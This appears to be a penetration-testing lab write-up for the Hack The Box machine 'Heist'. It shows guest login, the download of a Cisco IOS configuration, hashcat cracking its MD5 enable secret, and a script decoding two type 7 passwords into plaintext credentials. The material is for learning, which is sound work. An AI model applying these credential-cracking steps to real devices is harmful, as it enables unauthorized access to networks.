InfoSec LAB

Heist_Web_80

Created: 3 min read

Webroot

Nmap scan earlier revealed the web server running on port 80 Upon navigating to the web root, I got re-directed to /login.php It’s a login page and there is an option to login as guest

wappalyzer identified the technologies involved. The website is written in PHP 7.3.1

config.txt

I went ahead and logged in as Guest, and got re-directed to /issues.php I see 2 usernames Hazard and Support Admin who had the admin badge There is an issue with Hazard user’s Cisco router and the Hazard user provided the configuration file as an attachment

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ wget http://$IP/attachments/config.txt              
--2022-10-10 20:37:00--  http://10.10.10.149/attachments/config.txt
Connecting to 10.10.10.149:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 780 [text/plain]
Saving to: ‘config.txt’
 
config.txt                              100%[==============================================================================>]     780  --.-KB/s    in 0s      
 
2022-10-10 20:37:00 (130 MB/s) - ‘config.txt’ saved [780/780]

I downloaded the config.txt file via wget

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ cat config.txt                                                                     
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

It is indeed a configuration file for Cisco IOS.

  • It contains the security MD5 password hash below for the router itself enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
  • It also contains 2 user credentials encrypted in the Cisco type 7  username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
  • It has a WRONG IP routing configuration as the netmask start with 300 lol. No wonder the user is experiencing problem network 192.168.0.0 mask 300.255.255.0
PS C:\> .\hashcat.exe -a 0 -m 500 \\10.1.1.2\\smb\home\kali\archive\htb\labs\heist\hash \\10.1.1.2\smb\usr\share\wordlists\rockyou.txt  -O --self-test-disable -d 2
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 1383 MB
 
Dictionary cache hit:
* Filename..: \\10.1.1.2\smb\usr\share\wordlists\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Mon Oct 10 22:47:24 2022 (2 secs)
Time.Estimated...: Mon Oct 10 22:47:26 2022 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (\\10.1.1.2\smb\usr\share\wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  2902.2 kH/s (12.25ms) @ Accel:128 Loops:125 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3980052/14344385 (27.75%)
Rejected.........: 47892/3980052 (1.20%)
Restore.Point....: 2973052/14344385 (20.73%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidate.Engine.: Device Generator
Candidates.#2....: uratok1 -> sassy112
Hardware.Mon.#2..: Temp: 59c Util: 44% Core:1731MHz Mem:5995MHz Bus:8
 
Started: Mon Oct 10 22:47:19 2022
Stopped: Mon Oct 10 22:47:27 2022

Hashcat easily crack the Cisco IOS security secret; stealth1agent

While there are many online tools available, I just decided to use this one

┌──(kali㉿kali)-[~/…/htb/labs/heist/hashes]
└─$ python2 ciscot7.py -f config.txt 
Decrypted password: $uperP@ssword
Decrypted password: Q4)sJu\Y8qz*A3?d

rout3r:$uperP@ssword admin:Q4)sJu\Y8qz*A3?d Password hashes cracked.

Now that I got a handful of usernames and passwords, I can try to see if there is a match

Interactive Graph View

Backlinks